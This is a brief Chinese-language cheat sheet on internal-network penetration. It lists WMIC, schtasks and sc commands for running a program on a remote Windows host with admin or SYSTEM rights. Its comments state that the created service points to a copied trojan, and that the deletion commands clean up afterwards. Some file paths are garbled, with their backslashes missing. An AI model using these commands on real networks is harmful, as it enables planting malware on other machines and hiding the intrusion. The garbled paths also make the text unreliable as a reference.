内网渗透的一些小总结（长期更新）

WMIC远程运行命令

wmic /node:host /user:administrator /p 密码 process call create “c:windows empfoobar.exe” 


schtasks计划任务远程运行

schtasks /create /tn foobar /tr c:windows empfoobar.exe /sc once /st 00:00            /S host /RU System 

schtasks /run /tn foobar /S host 

schtasks /F /delete /tn foobar /S host ##清除schtasks


SC添加服务远程运行命令

sc \host create foobar binpath=“c:windows empfoobar.exe”    ##新建服务,指向拷贝的木马路径 

sc \host start foobar        ##启动建立的服务 
sc \host delete foobar    ##完事后删除服务